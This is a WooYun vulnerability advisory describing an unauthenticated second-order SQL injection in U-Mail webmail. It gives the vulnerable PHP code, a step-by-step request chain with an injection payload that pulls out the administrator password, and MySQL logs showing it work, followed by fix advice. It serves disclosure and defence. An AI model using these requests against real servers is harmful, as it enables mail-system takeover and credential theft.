当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-093488

漏洞标题:U-Mail邮件系统二次注入2(无需登录,可批量直接获取管理员密码)

相关厂商:U-Mail

漏洞作者: Ano_Tom

提交时间:2015-01-23 11:06

修复时间:2015-04-23 11:08

公开时间:2015-04-23 11:08

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-23: 细节已通知厂商并且等待厂商处理中
2015-01-28: 厂商已经确认,细节仅向厂商公开
2015-01-31: 细节向第三方安全合作伙伴开放
2015-03-24: 细节向核心白帽子及相关领域专家公开
2015-04-03: 细节向普通白帽子公开
2015-04-13: 细节向实习白帽子公开
2015-04-23: 细节向公众公开

简要描述:

声明:不是故意刷漏洞,只是每天打完LOL后分析下,找到一个提交一个,见谅。我卡牌玩的还是很6的。:)

详细说明:

漏洞文件/fast/oab/module/operates.php代码
与上一个二次注入缺陷原理都一样,这次是另一个文件,是无需登录的

if ( ACTION == "save-to-pab" )
{
include_once( LIB_PATH."PAB.php" );
$PAB = PAB::getinstance( );
$maillist_id = trim( $_GET['maillist'] );
if ( $maillist_id )
{
......
}
else
{
$user_ids = trim( $_GET['userlist'] );
if ( !$user_ids )
{
dump_msg( "param_error", "参数错误!" );
}
$where = "t1.UserID IN (".$user_ids.")";//这里是之前提交的一个注入
$arr_tmp = $Mailbox->getMailboxInfo( $domain_id, $where, "", "", "", "", 0 );//此处是从数据库里读出用户数据
$user_all = $arr_tmp['data'];
if ( !$user_all )
{
dump_json( array( "status" => TRUE, "message" => "" ) );
}
foreach ( $user_all as $user )
{
$qq = $msn = "";
if ( strpos( $user['qqmsn'], "@" ) )
{
$msn = $user['qqmsn'];
}
else
{
$qq = $user['qqmsn'];
}
if ( !$PAB->getContactByMail( $user_id, $user['email'], "contact_id", 0 ) )
{
$data = array(
"user_id" => $user_id,
"fullname" => $user['FullName'],//将读出的数据未经处理
"pref_email" => $user['email'],
"pref_tel" => $user['teleextension'] ? $user['teleextension'] : $user['mobil'],
"birthday" => $user['birthday'],
"im_qq" => $qq,
"im_msn" => $msn,
"updated" => date( "Y-m-d H:i:s" )
);
$res = $PAB->add_contact( $data, 0 );//将从读出的数据未经处理,直接执行了插入操作
if ( !$res )
{
dump_json( array( "status" => FALSE, "message" => "添加联系人时发生错误,添加失败!" ) );
}
}
}
}
dump_json( array( "status" => TRUE, "message" => "" ) );
}


我们寻找可控的用户数据输入,代码在/fast/option/module/o_userinfo.php为

if ( !defined( "PRELOAD_OK" ) )
{
exit( "error" );
}
$user_id = get_session( "user_id" );
$domain_id = get_session( "domain_id" );
if ( ACTION == "userinfo" )
{
$url = "/webmail/fast/option/index.php?module=view&action=userinfo";
$where = "UserID='".$user_id."'";
$data = array(
"fullname" => gss( $_POST['fullname'] )//修改姓名
);
$result = $Mailbox->update_mailbox( $data, $where, 0 );//修改姓名,执行更新操作
if ( !$result )
{
redirect( $url, "修改姓名时出现错误,修改失败!" );
}
$data = array(
"sex" => gss( $_POST['gender'] ),
"birthday" => gss( $_POST['bd_year'] )."-".gss( $_POST['bd_month'] )."-".gss( $_POST['bd_day'] ),
"mobil" => gss( $_POST['mobile'] ),
"teleextension" => gss( $_POST['tel'] ),
"qqmsn" => gss( $_POST['im'] )
);
$result = $Mailbox->update_info( $data, $where, 0 );//先修改用户个人信息,第一步
$msg = $result ? "" : "修改用户信息时出现错误,修改失败!";
redirect( $url );
}


无需登录的原因见之前的漏洞分析,其只验证了一个用户名,存在该用户名即认为登录成功,从而可执行之后的所有敏感函数,而系统又默认存在system帐号,所以可以利用。漏洞利用过程为
向http://mail.fuck.com/webmail/fast/index.php?module=operate&action=login post如下数据[email protected]&link=? 从而获得登录认证,如图

a.png


然后执行修改中文名的功能,执行请求为,向
http://mail.fuck.com/webmail/fast/option/index.php?module=operate&action=userinfo post数据,fullname=',`homepage`=(SELECT password from userlist where userid=2)# 如图

b.png


然后执行如下操作,

c.png


150123 10:12:23	 2720 Connect	umail@localhost on 
2720 Query SET NAMES 'UTF8'
2720 Init DB umail
2720 Query UPDATE userlist SET `fullname`='\',`homepage`=(SELECT password from userlist where userid=2)#' WHERE UserID='2'
2720 Query UPDATE mailuserinfo SET `sex`='',`birthday`='--',`mobil`='',`teleextension`='',`qqmsn`='' WHERE UserID='2'
2720 Quit


更新操作为

150123 10:15:48	 2723 Connect	umail@localhost on 
2723 Query SET NAMES 'UTF8'
2723 Init DB umail
2723 Query SELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*
FROM userlist as t1, mailuserinfo as t2
WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0 AND t1.UserID IN (2)
ORDER BY t1.OrderNo DESC,t1.Mailbox ASC
2723 Query SELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*
FROM userlist as t1, mailuserinfo as t2
WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0 AND t1.UserID IN (2)
ORDER BY t1.OrderNo DESC,t1.Mailbox ASC
2723 Quit
150123 10:15:50 2678 Query SELECT DomainName from domains
2678 Query SELECT UserID, Mailbox, FullName, MailDir, Password, AutoDecode, IsForwarding, AllowAccess, AllowChangeViaEmail, KeepForwardedMail, HideFromEveryone, EncryptMail, ApplyQuotas, EnableMultiPop, CanModifyGAB, CalendarOnly, MaxMessageCount, MaxDiskSpace, UserList.DomainID, Domains.DomainName, Domains.DomainID FROM UserList, Domains WHERE UserList.DomainID=Domains.DomainID AND FullName = 'mdaemon server' AND DomainName = 'fuck.com'
2678 Query SELECT DomainName from domains
2678 Query SELECT * FROM Domains


发现其并未执行insert操作,原因是,if ( !$PAB->getContactByMail( $user_id, $user['email'], "contact_id", 0 ) )
即当查不到数据时候才可以,所以此处还是使用一个普通的用户名来获取system管理的密码获得管理过程为,首先执行获得session

d.png


第二步,更改用户信息
http://mail.fuck.com/webmail/fast/option/index.php?module=operate&action=userinfo post数据为fullname=',`homepage`=(SELECT password from userlist where userid=2)#

e.png


第三步,获取用户的userid
http://mail.fuck.com/webmail/fast/oab/index.php?module=operate&action=member-get&page=1&orderby=&is_reverse=1&keyword=test0008

f.png


第四步,执行修改操作http://mail.fuck.com/webmail/fast/oab/index.php?module=operate&action=save-to-pab&userlist=10

g.png


第五步,发现虽然更新了数据,但并无法查看到个人的信息,多次查找发现,有一处导出通讯录的功能可使用,因而构造请求
http://mail.fuck.com/webmail/fast/pab/index.php?module=operate&action=contact-export即可,结果如图

h.png


获得管理员密码,即获得整个系统的控制权限,整个sql执行的过程为

150123 10:28:14	 2744 Connect	umail@localhost on 
2744 Query SET NAMES 'UTF8'
2744 Init DB umail
2744 Query UPDATE userlist SET `fullname`='\',`homepage`=(SELECT password from userlist where userid=2)#' WHERE UserID='10'
2744 Query UPDATE mailuserinfo SET `sex`='',`birthday`='--',`mobil`='',`teleextension`='',`qqmsn`='' WHERE UserID='10'
2744 Quit


150123 10:29:50	 2747 Connect	umail@localhost on 
2747 Query SET NAMES 'UTF8'
2747 Init DB umail
2747 Query SELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*
FROM userlist as t1, mailuserinfo as t2
WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0 AND t1.UserID IN (10)
ORDER BY t1.OrderNo DESC,t1.Mailbox ASC
2747 Query SELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*
FROM userlist as t1, mailuserinfo as t2
WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0 AND t1.UserID IN (10)
ORDER BY t1.OrderNo DESC,t1.Mailbox ASC
2747 Query SELECT contact_id FROM pab_contact WHERE user_id='10' AND pref_email='[email protected]' LIMIT 1
2747 Query INSERT INTO pab_contact SET `user_id`='10',`fullname`='',`homepage`=(SELECT password from userlist where userid=2)#',`pref_email`='[email protected]',`pref_tel`='',`birthday`='0000-00-00',`im_qq`='',`im_msn`='',`updated`='2015-01-23 10:29:50'
2747 Quit

漏洞证明:

如上

修复方案:

1.出库后继续入库也需要转义等处理
2.fast的目录下的几个模块认证缺陷,其实这目录完全可以删除,client下的功能不都已经有了嘛

版权声明:转载请注明来源 Ano_Tom@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-01-28 09:31

厂商回复:

CNVD确认所述情况,已经由CNVD通过以往建立的处置渠道向软件生产厂商通报。

最新状态:

暂无